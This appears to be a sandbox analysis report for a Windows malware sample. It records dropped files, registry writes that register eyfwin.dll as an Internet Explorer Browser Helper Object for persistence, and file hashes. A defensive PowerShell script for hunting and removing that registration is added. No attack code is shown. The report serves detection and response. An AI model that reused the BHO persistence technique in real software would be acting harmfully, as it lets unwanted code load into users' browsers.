| SHA512 | 10e13a795525cba53f0bef5b5a4cba65ea86d9661c77c7f8ce7f1d8ca4c8e7b7b976815bee29504d6bd9d5e4c7533aa19930c40630df6061d6f4d6841ce38d05 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f129a7584bfca49ca9d542a5dec1d270 |
| SHA1 | 78ad5b9f686911cb83b41977f8b63b9f526ed3b1 |
| SHA256 | 7cb25e74916977abcb0c63ee1f2f53504b32373ec961464f0170f8f617652b3c |
| SHA512 | 8d36431ae0669ebc016a03adebc4e7bac7ff4f04f43db178c220074893bbbc3effc70ceea82734a58f8162a8bc050ea6baa3edb311a483c64779da7d29a615c3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6f2c1b0824ace765fe2baefece1fe768 |
| SHA1 | d4f283e8e7605390023c8e55ae557cc8e836bbff |
| SHA256 | 5b10db8df1e642bb38294a19da61e0feefc423ceddd3d80290c8578fdb0264ea |
| SHA512 | c82f9874bd50ddbb4b73473eb9f63417d024abd9e088554c4e5a0dc4e0a7f07c531fb43d681e7ad1b49d3309fed5ea1023f53f4a5ac4a332084a746ede1a7016 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f438fcc6a9b10da54c4ced3d64658886 |
| SHA1 | 322b91aef090ab2728f8c06d7a647f5d28716be7 |
| SHA256 | 6a876a12207b0ea806aaaa94d57d9534d7ada7c1b27a94491307eccd539c5113 |
| SHA512 | 2ecd425176e24d645272be0952d6bb967a1d3e7f7875d5c06d15459a46f6928a8d92ca45d410ea520db12d697b7a2c1283034dc052b637e7aa5d6ae9969e138c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 69ec01c27e22686a553e3c94f5394c72 |
| SHA1 | 657383be1ec860a1b2fd59e68b4341d86277cbdf |
| SHA256 | d9f33e3e21f1d6da032fc772c3e3f7be2fd7b8bedc07b1debbe058ed7ba00497 |
| SHA512 | ed4acc5c8769da913b42bfa46975eca30b521aaafe07b8a2a494dfbbaf9db2438b4dd976a1f505c20fca2fb2756985f1f0ef885ff1b1886a5ffac8bd6608fa2a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3c0e4d35acbd2ef05abd322ecaa5eb15 |
| SHA1 | 3531d7f99f710c5126dfbdcbe6473d81bdaa9dce |
| SHA256 | 7a8d9df8f43910b2411700ef7db64cdb42b55b9c05ef663d6d73060b0d69ad56 |
| SHA512 | 64ac5bca35374326a77f00f6681905a77fdbe8e27578bf85b5d7d99a3a46c590226e502d46bdea96afd0095ff4107af7e2c8e389fe5733d9da1aa3d5f961885b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 367dcef0fe9c67c55f15fa21ad09f6f2 |
| SHA1 | c2731ce226fc9ee50f3cda95aaadbced646aaf2d |
| SHA256 | 7df5755d36adc33dc04f354458037a3649dbf82daf028bef17d2119bf2ea28da |
| SHA512 | 88b74696754baf1d141923fb88e97f1e48fb620c4b643fda598b1d60d9394880dc8bfe1e112d8e61956c1670d264342c5413fd712b2982dc469bd0bb32c04634 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e789ed7acaf0e3e374abad0065bdecef |
| SHA1 | cd69cfa42c3596ff1c587a9ab60c78840ca20d03 |
| SHA256 | fd2bf820088e8fd91d11b9a6971e1c606d3d5eb9ebb2d2fd8c1cae93ad395e78 |
| SHA512 | 951e218aa89060704b688f9c6f378640262f079c7774c9d11e5ce7b895f886970504aa29649a6f36587a574ae3f1bf4418b3e3acc5b04324e05fca8bd170b531 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2904ab405bdb5dfa9101408416dda90a |
| SHA1 | 7a135cc0b54d97253249d8305998d049a4d55d77 |
| SHA256 | 3a003280243da33f36001ddd202c7c35ae4ca75ac25aab5876a730be4590f8b5 |
| SHA512 | 7f8d9219d841d6d82c036435e89051425f652bb10b08c9ef9c75cdb24798cf9f6e28bdcc78d3004f8b96721b6958cd92e85a700dc9ec9058e1970ba487c5f686 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 60c27e4ea9787f7c6005e81c87cc6277 |
| SHA1 | b7fdda940467090d520d1cfdbe56cc704fa293a8 |
| SHA256 | 4a96c801e20ae70ea980f98ca2937637cc2f1175c6d7faa11b97f9de263c2e64 |
| SHA512 | 8ff28c92d8841a3ff87bfca5d2460d4a2c89c8f4bccd2911a645e5df3017e83e008df8b3502922e3356134b5e0ea784a5a87f17c935cbba0c3de0556ea39cce6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 409fc0a781e38a9e0b3a61bc34e95797 |
| SHA1 | 1e0dce5555658d89115017d0432818f9e10d8da6 |
| SHA256 | 6e185d3b59a23df9c9abab59059a240f84e5b0ee238a37977a19f92328877905 |
| SHA512 | 4fd486113829c7c9dbd2b7127373c0b7e9b869ba6e1115a9f44ed6f51d8b963bbb7cc1af930c0fb586c98d731e1c268a128e1a124e76f009c36e90d245c6dec2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 16a0408b7e50caebd1e9b1be56136b38 |
| SHA1 | c566cb32813b099ad62d7ccbc58dfc450eee5e06 |
| SHA256 | 7564baaac54af7922e37bb659aa523e27dee836f144e30b76f684833999839ee |
| SHA512 | f7f6aba1adf2dabdc6278a70a6b9e25c9dfaac0e7bc2240b3cc6f0375ff6de79c59f29c373ac32ce011c831050a236195b8d209ef8d26786af79bc7cba8a0c34 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e8bcd45deff100a048e93cca379d40c4 |
| SHA1 | 27efe2a3eb4f4a66056868ca31fca79fc85c5646 |
| SHA256 | 125068523483e7fd9fc4bd3480220a276dea43d554e4fe91b5cc33e72d1de960 |
| SHA512 | 1161c13910981d65beba088733f2770c069609e278d3a52a279bfa2658d184c5d79158deaf77b127a3e2301bad8038dad0431a67142abce2bf65ec85be3aee7d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 29091c8dc162630c302427dca5182657 |
| SHA1 | 2d4cb12ac55365bf40b8fe5bc1a9db5ded2eb9a1 |
| SHA256 | b27344e52bd4279c35b74d743e949767e474c5f17aad84dd7b4544f95b141589 |
| SHA512 | 7cb720c94f3934c32fdc4eab4cd3f90b632a82e90d321706dd8d836202ab96371c6096bb08735552987a7ae686a6cd80025d9b14fda8c03a52f8d355f8a99bdf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 60b047687e7c5636d62a2ea31ca18fba |
| SHA1 | b10e06c6a43efb87691bf320eedcbf69b4870f31 |
| SHA256 | f910bc4a3faadadc608a10b2cfb33ea5e67a301b1fc1b2c24574c6f2cc279c15 |
| SHA512 | 96638dc420a69ef1e5eab6f9c89d131c78eb4170319cf1d4f49dd68a52285e363f21316b406a111ab696830a79aa71d18ad37d55a689cceca5a97851ea511445 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 35bf63c2f10f6b4d70baa538f7f70c4c |
| SHA1 | e9dd9e51adf2469cf5221281722e608bcd8101fd |
| SHA256 | 41cf0e30302a32f0981358fe41a3d4dfdf9b962ca5542914766fc010c5de61b8 |
| SHA512 | 3673616152a7c407b7ad7e44ddbb5c0b01618e2ad055e3db375cb1d506ed1265e0836422abd30b3e49e216b263c4064ae91efd52a30be2c7cc34fcf7aa0bc491 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-04 19:42
Reported
2024-02-04 19:44
Platform
win10v2004-20231222-en
Max time kernel
146s
Max time network
145s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BDF6E57E-7330-40CB-8363-D82E9BFF223B} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\sf.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\c.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\m.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\m3.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\s.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\eyfwin.dll | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\p.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\ios.dat | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ = "Iffgd3c" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\ = "TrumanBar" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\ = "TrumanBar" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\Programmable | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32\ = "C:\\Windows\\SysWow64\\eyfwin.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ProgID\ = "Ho4ydomoj.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\VersionIndependentProgID\ = "Ho4ydomoj" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ = "Iffgd3c" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ = "TrumanBar" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\ = "ddf457 Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CurVer\ = "Ho4ydomoj.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ = "_Iffgd3cEvents" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32\ = "C:\\Windows\\SysWow64\\eyfwin.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CLSID\ = "{BDF6E57E-7330-40CB-8363-D82E9BFF223B}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ = "_Iffgd3cEvents" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\CLSID\ = "{BDF6E57E-7330-40CB-8363-D82E9BFF223B}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR\ = "C:\\Windows\\SysWow64\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
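Read together, the rows above are one COM registration, not dozens of unrelated writes: the 32-bit regsvr32.exe (the dropper is a 32-bit process, so WOW64 file-system redirection turns the `C:\Windows\system32\eyfwin.dll` in its command line into SysWOW64) registers CLSID {BDF6E57E-7330-40CB-8363-D82E9BFF223B} with InprocServer32 = C:\Windows\SysWow64\eyfwin.dll, ProgID Ho4ydomoj.1 with display name "TrumanBar", type library {A8954909-1F0F-41A5-A7FA-3B376D69E226}, and then lists the CLSID under Explorer\Browser Helper Objects so that Internet Explorer loads the DLL in-process at startup. The PowerShell below is an added hunting check, not part of this report or of the sample: it walks both BHO registry views on a host, resolves each CLSID to its InprocServer32 DLL, and flags the CLSID from this report and the eyfwin.dll SHA256 recorded in the Files section. It assumes an elevated session and that InprocServer32 holds a plain file path (as it does here); the flag labels and output columns are my own.

```powershell
# Added triage example, not code from the sandbox report or from the sample.
# Enumerates Browser Helper Object registrations in both the native and the
# Wow6432Node registry views, resolves each CLSID to the DLL that will be loaded,
# and flags the CLSID / DLL hash observed in this detonation. Run elevated.

$KnownBadClsid  = '{BDF6E57E-7330-40CB-8363-D82E9BFF223B}'   # BHO CLSID from the report
$KnownBadSha256 = 'E232EF1159527F8EF57F480DCF0399D9B718354E90449545B1A3B7EA30015871'  # eyfwin.dll SHA256 from the Files section

# The 32-bit regsvr32 in this report wrote to the Wow6432Node view; check both anyway.
$bhoKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects'
)

function Resolve-BhoServer {
    param([string]$Clsid, [bool]$Wow64)
    # The default value of CLSID\{...}\InprocServer32 is the DLL the host loads in-process.
    $clsidRoot = if ($Wow64) { 'HKLM:\SOFTWARE\Classes\WOW6432Node\CLSID' } else { 'HKLM:\SOFTWARE\Classes\CLSID' }
    $inproc = Join-Path $clsidRoot "$Clsid\InprocServer32"
    if (-not (Test-Path $inproc)) { return $null }
    $raw = (Get-ItemProperty -Path $inproc -ErrorAction SilentlyContinue).'(default)'
    if (-not $raw) { return $null }
    # Assumption: a plain path, possibly quoted or using %SystemRoot%-style variables.
    return [Environment]::ExpandEnvironmentVariables($raw).Trim('"')
}

foreach ($key in $bhoKeys) {
    if (-not (Test-Path $key)) { continue }
    $wow64 = $key -like '*WOW6432Node*'
    foreach ($sub in Get-ChildItem -Path $key) {
        $clsid = $sub.PSChildName
        $dll   = Resolve-BhoServer -Clsid $clsid -Wow64 $wow64
        $hash  = $null
        $flags = @()

        if ($clsid -ieq $KnownBadClsid) { $flags += 'IOC:CLSID' }

        if ($dll -and (Test-Path $dll)) {
            $hash = (Get-FileHash -Path $dll -Algorithm SHA256).Hash
            if ($hash -ieq $KnownBadSha256) { $flags += 'IOC:SHA256' }
            # The report lists the dropper as an unsigned PE; an unsigned BHO DLL is worth a look on its own.
            $sig = Get-AuthenticodeSignature -FilePath $dll
            if ($sig.Status -ne 'Valid') { $flags += "Signature:$($sig.Status)" }
        } else {
            $flags += 'DLL missing'
        }

        [pscustomobject]@{
            View   = if ($wow64) { 'Wow6432Node' } else { 'Native' }
            CLSID  = $clsid
            DLL    = $dll
            SHA256 = $hash
            Flags  = ($flags -join ',')
        }
    }
}
```

Pipe the output to Format-Table -AutoSize for a quick read, or to Export-Csv when sweeping many hosts. A match on the CLSID alone is enough to pull the DLL for analysis; a match on the hash confirms the same eyfwin.dll build as in this report. Remediation is the reverse of the registration above (regsvr32 /u on the DLL, or deleting the BHO and CLSID keys by hand), plus removal of the dropped .ico files in SysWOW64 and C:\Windows\ios.dat listed in the drop tables.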
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
